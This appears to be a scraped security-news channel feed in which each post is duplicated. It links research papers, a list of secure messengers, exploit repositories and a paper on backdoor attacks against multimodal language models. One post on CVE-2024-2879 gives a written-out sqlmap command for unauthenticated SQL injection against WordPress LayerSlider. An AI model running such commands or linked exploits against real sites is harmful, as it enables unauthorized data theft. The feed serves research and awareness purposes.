Vuln_Hunting_WDM.pdf
1.8 MB
#tools
#Threat_Research
"Enhanced Vulnerability Hunting in WDM Drivers Using Symbolic Execution and Taint Analysis", 2023.
]-> tool to hunt vulns in x64 WDM drivers:
https://github.com/zeze-zeze/ioctlance
#Threat_Research
"Enhanced Vulnerability Hunting in WDM Drivers Using Symbolic Execution and Taint Analysis", 2023.
]-> tool to hunt vulns in x64 WDM drivers:
https://github.com/zeze-zeze/ioctlance
Cookie_analysis.pdf
810.7 KB
#Research
"Automated Large-Scale Analysis of Cookie Notice Compliance", 2024.
]-> CookieBlock Browser Extension:
https://github.com/dibollinger/CookieBlock
"Automated Large-Scale Analysis of Cookie Notice Compliance", 2024.
]-> CookieBlock Browser Extension:
https://github.com/dibollinger/CookieBlock
ChkUp.pdf
916.4 KB
#Threat_Research
"Your Firmware Has Arrived: A Study of Firmware Update Vulnerabilities", 2023.
]-> https://fw-chkup.github.io
"Your Firmware Has Arrived: A Study of Firmware Update Vulnerabilities", 2023.
]-> https://fw-chkup.github.io
SoK.pdf
581.7 KB
#Fuzzing
#Research
"SoK: Prudent Evaluation Practices for Fuzzing", 2024.
]-> https://github.com/fuzz-evaluator
]-> Fuzzing Evaluation Guidelines:
https://github.com/fuzz-evaluator/guidelines
#Research
"SoK: Prudent Evaluation Practices for Fuzzing", 2024.
]-> https://github.com/fuzz-evaluator
]-> Fuzzing Evaluation Guidelines:
https://github.com/fuzz-evaluator/guidelines
cyber_chi.pdf
1.7 MB
#Analytics
#Threat_Research
"China’s Cyber Revenge
Why the PRC Fails to Back Its Claims of Western Espionage", 2024.
#Threat_Research
"China’s Cyber Revenge
Why the PRC Fails to Back Its Claims of Western Espionage", 2024.
TestTime_attacks.pdf
4.8 MB
#MLSecOps
"Test-Time Backdoor Attacks on Multimodal Large Language Models", 2024.
]-> https://github.com/sail-sg/AnyDoor
"Test-Time Backdoor Attacks on Multimodal Large Language Models", 2024.
]-> https://github.com/sail-sg/AnyDoor
Evaluating_forensic_tools.pdf
579 KB
#Whitepaper
"Evaluating the Efficacy of Network Forensic Tools: A Comparative Analysis of Snort, Suricata, and Zeek in Addressing Cyber Vulnerabilities", 2024.
"Evaluating the Efficacy of Network Forensic Tools: A Comparative Analysis of Snort, Suricata, and Zeek in Addressing Cyber Vulnerabilities", 2024.
NIST_SP800_55v1.pdf
896.3 KB
#Infosec_Standards
NIST SP 800-55 v.1:
"Measurement Guide for Information Security", 2024.
Vol.1 - Identifying and Selecting Measures
Vol.2 - Developing an Information Security Measurement Program
NIST SP 800-55 v.1:
"Measurement Guide for Information Security", 2024.
Vol.1 - Identifying and Selecting Measures
Vol.2 - Developing an Information Security Measurement Program
KernelGPT.pdf
3.5 MB
"KernelGPT: Enhanced Kernel Fuzzing via Large Language Models", 2024.
]-> https://github.com/kernelslacker/trinity
]-> https://github.com/kernelslacker/trinity
KeyTrap in DNS (CVE-2023-50387)
https://github.com/knqyf263/CVE-2023-50387?tab=readme-ov-file
https://github.com/knqyf263/CVE-2023-50387?tab=readme-ov-file
一些安全的IMs选项 ——
1. E2EE + 开源
Session
Delta Chat
Simplex Chat
Silence
Wire
Safe Text
2. Matrix客户端
Element
Syphon
Cinny
FluffyChat
SchildiChat
3. 离线可用(网状网络)
berty
dIM Chat
Rumble
Serval Mesh
FireChat
Meshenger
Berkanan
Mesh
4. 基于Tor
Tinfoil Chat
Ricochet Refresh
Briar
Tox
Speek
cwtch.im
5. 区块链
Status
Mixin
Adamant
iMe Messenger & Crypto Wallet
6. 分叉
Molly (Signal)
DarkMessenger (Conversations)
aTox 0.6.0 (Tox)
Taranis (Jami)
7. VOIP/SIP/视频通话
Jami
Pryvate Now
Rocket.Chat
Jitsi Meet
Sipnetic
Linphone
8. XMPP (OTR/OMEMO)
Conversations
CoyIM
Dino.
Pidgin
Gajim
blabber
Beagle
MirandaNG
Wime
ChatSecure
(这里有完整的名单:https://omemo.top/)。
#tools
1. E2EE + 开源
Session
Delta Chat
Simplex Chat
Silence
Wire
Safe Text
2. Matrix客户端
Element
Syphon
Cinny
FluffyChat
SchildiChat
3. 离线可用(网状网络)
berty
dIM Chat
Rumble
Serval Mesh
FireChat
Meshenger
Berkanan
Mesh
4. 基于Tor
Tinfoil Chat
Ricochet Refresh
Briar
Tox
Speek
cwtch.im
5. 区块链
Status
Mixin
Adamant
iMe Messenger & Crypto Wallet
6. 分叉
Molly (Signal)
DarkMessenger (Conversations)
aTox 0.6.0 (Tox)
Taranis (Jami)
7. VOIP/SIP/视频通话
Jami
Pryvate Now
Rocket.Chat
Jitsi Meet
Sipnetic
Linphone
8. XMPP (OTR/OMEMO)
Conversations
CoyIM
Dino.
Pidgin
Gajim
blabber
Beagle
MirandaNG
Wime
ChatSecure
(这里有完整的名单:https://omemo.top/)。
#tools
👍2
#exploit
1. CVE-2024-1346:
Weak MySQL database root password in LaborOfficeFree
https://github.com/PeterGabaldon/CVE-2024-1346
2. A modern dashboard exploit for MS Xbox
https://github.com/XboxDev/endgame-exploit
1. CVE-2024-1346:
Weak MySQL database root password in LaborOfficeFree
https://github.com/PeterGabaldon/CVE-2024-1346
2. A modern dashboard exploit for MS Xbox
https://github.com/XboxDev/endgame-exploit
👍4
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
👍3
Bypassing anti-reversing defences in iOS applications
https://twelvesec.com/2023/10/10/bypassing-anti-reversing-defences-in-ios-applications/
https://twelvesec.com/2023/10/10/bypassing-anti-reversing-defences-in-ios-applications/
Twelvesec
Bypassing anti-reversing defences in iOS applications - Twelvesec
A walktrough on dynamically bypassing anti-debugging and anti-reversing defences in iOS applications.
👍2
OSINT Method for Map Investigations.
➡️ https://redteamrecipe.com/osint-method-for-map-investigations
#OSINT
➡️ https://redteamrecipe.com/osint-method-for-map-investigations
#OSINT
ExpiredDomains.com
redteamrecipe.com is for sale! Check it out on ExpiredDomains.com
Buy redteamrecipe.com for 195 on GoDaddy via ExpiredDomains.com. This premium expired .com domain is ideal for establishing a strong online identity.
👍2👏1
This simple instruction shows how to search for leaked credentials on website using Google Chrome's Developer Tool (and anything else using #regex).
https://github.com/h4x0r-dz/Leaked-Credentials/
Contributor twitter.com/h4x0r_dz
Tip by twitter.com/RootMoksha
https://github.com/h4x0r-dz/Leaked-Credentials/
Contributor twitter.com/h4x0r_dz
Tip by twitter.com/RootMoksha
👍2